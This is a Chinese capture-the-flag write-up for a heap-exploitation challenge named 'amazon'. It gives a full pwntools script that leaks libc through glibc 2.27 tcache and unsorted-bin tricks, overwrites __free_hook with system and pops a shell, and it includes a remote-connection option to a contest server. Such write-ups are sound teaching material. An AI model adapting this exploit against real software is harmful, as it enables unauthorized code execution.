数字经济 pwn amazon writeup

思路

1、利用glibc-2.27的tcache机制连续释放八次unsortedbin，再输出，可以leak出libc的基址
2、利用unsortedbin的合并，overlap修改tcache表的fd位为_free_hook的地址
3、提前把”$0\x00”(/bin/sh)写入到堆块中
4、申请堆块到_free_hook附近，修改__free_hook为system,
5、释放堆块，得到shell

exp

本地环境：ubuntu 18.04

#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"

exe = './amazon'
elf = ELF(exe)

one = [0x4f2c5, 0x4f322, 0x10a38c]

#------------------------------------
def d(s = ''):
    gdb.attach(p ,s)

def manu(idx):
    p.sendlineafter('choice: ', str(idx))

def add(num, size, note):
    manu(1)
    p.sendlineafter('buy: ', str(1))
    p.sendlineafter('many: ', str(num))
    p.sendlineafter('note: ', str(size))
    p.send(note)


def add1(num, size, note):
    manu(1)
    p.sendlineafter('buy: ', str(1))
    p.sendline(str(num))
    p.sendline(str(size))
    p.sendline(note)

def show():
    manu(2)

def checkout(idx):
    manu(3)
    p.sendlineafter('for: ', str(idx))

def pwn():
    add(2, 0x80, 'a')  #0
    add(2, 0xa0, 'A')  #1
    add(2, 0x90, 'A')  #2
    add(2, 0x10, 'A')  #3
    for i in range(8):
        checkout(0)

    for i in range(8):
        checkout(2)

    show()
    p.recvuntil('Name: ')
    libc.address = u64(p.recv(6).ljust(8, '\x00')) - 0x3ebca0
    success('libc.address--->'+hex(libc.address))
    for i in range(8):
        checkout(1)
    add(2, 0x100, '\xff'*0x80 +p64(3)+p64(0xa1) + p64(libc.sym['__free_hook']-0x40)) #0 1
    checkout(0)
    add(2, 0xa0, 'a'*0x8)#4
    add(2, 0x100, '\x99'*0x80 +p64(3)+p64(0xa1) + '$0\x00')  #5
    add(2, 0xa0, '\x00'*0x20+p64(libc.sym['system']))
    #d()
    checkout(5)

    p.interactive()
#-------------------------------------
if __name__ == '__main__':
    l = 1
    if l:
        p = process(exe)
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        p = remote('121.41.38.38', 9999)
        libc = ELF('libc-2.27.so')

    pwn()

参考文章：
https://firmianay.gitbooks.io/ctf-all-in-one/doc/4.14_glibc_tcache.html
https://mp.weixin.qq.com/s/Q4A6LwCd2E29uSXjMJs1dg